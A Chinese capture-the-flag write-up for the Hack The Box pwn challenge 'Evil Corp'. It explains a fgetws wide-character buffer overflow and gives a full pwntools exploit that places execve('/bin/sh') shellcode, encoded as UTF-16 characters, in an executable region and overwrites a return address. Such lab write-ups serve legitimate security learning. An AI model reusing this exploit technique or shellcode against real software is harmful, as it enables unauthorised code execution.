HTB pwn Evil Corp

程序分析

在这里插入图片描述
初始化功能
申请了一块正常块和一块可以执行shellcode的空间

在这里插入图片描述
登录
在这里插入图片描述
向正常块写入数据
在这里插入图片描述
字符宽度转换

漏洞分析

所有的输入都使用了fgetws函数这个函数,这个函数会把整个串的每一个字符按最低两个宽来接收输入,如果存在unicode32等等更宽的字符这个函数会把每个字符都按最宽字符的宽度拓展。
例如:
‘a’ 总共占2个字节
‘a’ + '\u1111’总共占4个字节
‘a’ + '\U00000000’总共占8个字节
在这里插入图片描述
在这里插入图片描述
第二个函数是向正常块复制数据但是由于使用了fgetws实际上在空间中就会占用至少0x2000个字节又因为正常块大0x1000字节所以只需要输入0x800个ASCII就可以覆盖完正常块,接下来将shellcode两两一组编成unicode16传输就可以被程序正常接收了。
在这里插入图片描述
成功覆盖出正常块并且写入shellcode到可执行块上
在这里插入图片描述
这边也同理我们可以使用ASCII来多占空间完成栈溢出,最后可以使用unicode32字符一次性占4个字节完成地址覆盖。

exp

from pwn import *
context.arch = 'amd64'
def gd():
 gdb.attach(p)
 pause()
def login():
 p.recvuntil(b'Username: ')
 p.sendline(b'eliot') 
 p.recvuntil(b'Password: ')
 p.sendline(b'4007')
def logout():
 p.recvuntil(b">> ")
 p.sendline(b'3') 
def login1(data):
 p.recvuntil(b'Username: ')
 p.sendline(b'eliot') 
 p.recvuntil(b'Password: ')
 p.sendline(data) 
def input(data):
 p.recvuntil(b">> ")
 p.sendline(b'2')
 sleep(0.1)
 p.sendline(data)
p = process("./evil-corp")
#p = remote("94.237.54.75",54453)
login()
shellcode='\u686a\ub848\u622f\u6e69\u2f2f\u732f\u4850\ue789\u7268\u0169\u8101\u2434\u0101\u0101\uf631\u6a56\u5e08\u0148\u56e6\u8948\u31e6\u6ad2\u583b\u050f'
input('a'*0x800 + shellcode)
logout()
login1('a' * 0x56 + '\U00011000' + '\x00\x00')#0x56 * 4 = 0x158

p.interactive() 

成功getshell
在这里插入图片描述
在这里插入图片描述

  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值